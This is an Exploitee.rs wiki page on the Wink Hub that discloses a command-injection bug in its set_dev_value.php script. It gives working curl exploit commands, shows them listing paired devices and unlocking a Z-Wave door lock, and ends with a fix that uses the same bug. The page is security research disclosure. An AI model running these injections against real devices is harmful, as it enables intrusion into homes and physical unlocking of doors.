Wink Hub​​

From Exploitee.rs
Revision as of 10:40, 17 August 2014 by Zenofex (talk | contribs)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

WinkHub.jpg

This page will be dedicated to a general overview, descriptions, and information related to the Wink Hub.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Wink Hub at Amazon

Disassembly

UART

The pin-out for UART can be found on the image below.

set_dev_value.php Command Execution

The Wink Hub runs a web server and within the server has a script that allows for remote command execution. This php code for this script can be seen in the photo below.

source code of /set_dev_value.php vulnerability

As you can see the "nodeId" and "attrId" values are used in the sudo command string that is created and then used in the php "passthru()" call. This allows us to execute commands by simply posting a command as either a "nodeId" or "attrId" using any shell command formats (";;", "$()", "|", "``").

Example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"

Accessing Peripherals

Accessing peripherals attached to the device can be accomplished using the "/usr/sbin/aprontest" binary.

This binary is capable of listing all the attached peripherals as well as the peripheral states and state types.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -l;"
Found 1 devices in database...
MASTERID |     INTERCONNECT |                         USERNAME
       1 |            ZWAVE |      New SECURE_KEYPAD_DOOR_LOCK

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |         TRUE |         TRUE

Above you can see us querying the WinkHub from the bug within the "set_dev_value" PHP script to list the attached devices. We then use the "MASTERID" in the second query to find out exactly how to communicate with the attached peripheral.

Using the same "aprontest" binary, we can then manipulate the state of the attached device.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;"
Update device with master ID 1, setting value FALSE
Update callback: Status 0 on updating master ID: 1

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |        FALSE |        FALSE

The above example first sets the Lock_Unlock state to "FALSE" which unlocks the door lock. Then we query the device status again and confirm it is now "FALSE"

Demo

aprontest Syntax

Usage: aprontest [OPTION]...
Send commands and list information about connected devices

Operations:
  -a		Add a new home automation device
  -n		Manually add a home automation device to the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -d		Delete a home automation device
  -f		Force delete a home automation device from the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -u		Update the state of a home automation device with a new value
  -e		Force a refresh of a home automation device
  -g		Set a generic callback for a radio for one minute of radio
		testing
  -l		List general information about automation devices, or specific
		information about one device
  --set-name	Set user-readable name for a device

Other Options:
  -r <radio>	Specify a radio for an Add Device or Generic Callback operation.
		One of lutron, zwave, zigbee, kidde
  -m <id>	Specify a master device ID for a Delete, Update, Refresh, or
		List operation
  -t <id>	Specify an attribute ID for an Update operation
  -v <value>	Specify a new value to set for an Update operation

Kidde Specific Operations:
  -k <ID>	Set Kidde system ID

Z-Wave Specific Operations:
  --zwave_controller_reset	Reset the zwave controller. USE WITH CAUTION.
				Existing z-wave network will be lost.
  --zwave_remove_failed		Remove a failed zwave device. 
  --zwave_replace_failed	Replace a failed zwave device.
  --zwave_learn_mode		Enter Learn Mode on the Zwave Controller.
  --zwave_controller_shift	Hand off control to another (new) Zwave controller.
  --zwave_exclusion_mode	Enter Exclusion Mode on the Zwave Controller.

Lutron Specific Operations:
  --lutron_pico_add <dimmerMasterId>	Add dimmerMasterId to the control list for the pico controller with masterId set via -m
  --lutron_pico_del <dimmerMasterId>	Delete dimmerMasterId from the control list for the pico controller with masterId set via -m

Fixing "set_dev_value.php" Bug

This script isn't actually used for anything and can be removed or moved. This can be done by using the original bug to remove the script for which the bug is contained.

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;mv /var/www/set_dev_value.php /var/www/set_dev_value.php.txt;"